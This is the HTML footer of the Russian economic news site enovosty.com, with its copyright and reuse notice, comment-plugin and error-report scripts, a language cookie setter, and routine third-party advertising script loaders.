				    
							<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|
							<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|
							<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|
							<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/pravila-kommentirovaniya">Правила комментирования</a>|
							<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a>
						    
									</div>
                <div id="counters" >
				
				
                  </div>
                  <div id="textfooter">
                  <p>2018 &copy; "Экономические новости"</p>
                  <p>Все права защищены.				  </p>
<p>Использование материалов разрешается при условии ссылки на 
	<a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a>
 (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />
Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p>
                  </div>
				  <!-- https://prnews.io/ru/sites/85-enovostycom.html?i=11347 -->
				    
					  <a href="/contacts" target="_blank" rel="nofollow" style="
							float: right;
							font-weight: bold;
							color: #369;
							padding: 10px;
						">Размещение рекламы</a>
				 	
        </div>

    </div>
    
		<div class="links_bal">   
	
		</div>
</div>


	<script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script>
	
		
		<script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script>
				<script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script>
	
						<div id="error-notification-id" class="enp-4854077"></div>
						<div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div>
				   <a href='javascript:void(0);' id='wpdUserContentInfoAnchor' style='display:none;' rel='#wpdUserContentInfo' data-wpd-lity>wpDiscuz</a><div id='wpdUserContentInfo' style='overflow:auto;background:#FDFDF6;padding:20px;width:600px;max-width:100%;border-radius:6px;' class='lity-hide'></div><div id='wpd-editor-source-code-wrapper-bg'></div><div id='wpd-editor-source-code-wrapper'><textarea id='wpd-editor-source-code'></textarea><button id='wpd-insert-source-code'>Insert</button><input type='hidden' id='wpd-editor-uid' /></div><script type='text/javascript' id='error_notification_script-js-extra'>
/* <![CDATA[ */
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
/* ]]> */
</script>
<script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js?ver=1.3' id='error_notification_script-js'></script>
<script type='text/javascript' id='wpdiscuz-combo-js-js-extra'>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</script>
<script type='text/javascript' id='wpdiscuz-combo-js-js-before'>
        var wpdiscuzEditorOptions = {
        modules: {
        toolbar: "",
        counter: {
        uniqueID: "",
        commentmaxcount : 0,
        replymaxcount : 0,
        commentmincount : 1,
        replymincount : 1,
        },
		        },
        wc_be_the_first_text: "\u041e\u0441\u0442\u0430\u0432\u044c\u0442\u0435 \u043f\u0435\u0440\u0432\u044b\u0439 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439!",
        wc_comment_join_text: "\u041f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u043a \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u044e",
        theme: 'snow',
        debug: 'error'
        };
		
</script>
<script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wpdiscuz/assets/js/wpdiscuz-combo.min.js?ver=7.2.2' id='wpdiscuz-combo-js-js'></script>
<script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js?ver=5.7' id='wp-embed-js'></script>
<script type="text/javascript">(function() {
				var expirationDate = new Date();
				expirationDate.setTime( expirationDate.getTime() + 31536000 * 1000 );
				document.cookie = "pll_language=ru; expires=" + expirationDate.toUTCString() + "; path=/; domain=.enovosty.com; secure; SameSite=Lax";
			}());</script>	
		
	


	<script>
//		new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
        new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});
		new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});
//		new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
		new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});
		new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});
//		new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
	</script>
	
		
	
	
	

		
		<script>
	document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
	//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
	</script>
	<script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script>  
	<script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script>

		<script>
		//var pollsL10n = document.getElementById('pollsL10n');
	</script>
	
							
				
	
	


<!--<script type="text/javascript">
    admixerML.fn.push(function () {
        admixerML.defineSlot({
            z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',
            ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',
            i: 'inv-nets'
        });
        admixerML.singleRequest();
    });
</script>-->









		<!-- 
		<script type="text/javascript" charset="utf-8">
		  (function(d,s){
			var o=d.createElement(s);
			o.async=true;
			o.type="text/javascript";
			o.charset="utf-8";
			o.src="https://js.ru.redtram.com/n4p/0/27/ticker_27280.js";
			var x=d.getElementsByTagName(s)[0];
			x.parentNode.insertBefore(o,x);
		  })(document,"script");
		</script>
		-->
					
			
					

<!--
	<script type="text/javascript" charset="utf-8">
		(function(d,s){
			var o=d.createElement(s);
			o.async=true;
			o.type="text/javascript";
			o.charset="utf-8";
			if (location.protocol == "https:")
			{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }
			else
			{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }
			var x=d.getElementsByTagName(s)[0];
			x.parentNode.insertBefore(o,x);
		})(document,"script");
	</script>
-->
<script>jQuery(document).ready(function($){
setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);
});
</script>


<div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div>



	<!-- MMI CMeter -->
	<!-- /MMI CMeter -->

 



<!--- 01212138 --><iframe name="n01212138" style="display:none"></iframe><script>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</script>




<script type="text/javascript">
	if (typeof window._tx === "undefined") {
	var s = document.createElement("script");
	s.type = "text/javascript";
	s.async = true;
	s.src = "//st.hbrd.io/ssp.js"; 
	(document.getElementsByTagName("head")[0] ||
	document.getElementsByTagName("body")[0]).appendChild(s);
	}
	window._tx = window._tx || {};
	window._tx.cmds = window._tx.cmds || [];
	window._tx.cmds.push(function () {
	window._tx.init();
	});
</script>






	<div class="container">
		<div id="div-gpt-ad-1595961600637-0">
			<script>
			
				// setTimeout(function(){ 

				catfish('div-gpt-ad-1595961600637-0');
				
				
				// }, 1000);
				
		
			
				/*
				window.onload = function() {

					var element = document.getElementById('hstp_51671_push_frame');
					// if not advertising
					if (!element) {
						
						*/
				// catfish('div-gpt-ad-1595961600637-0');
						/*
					}	
				};
				*/
				
			</script>
		</div>
	</div>
	

</body>
</html>
		
		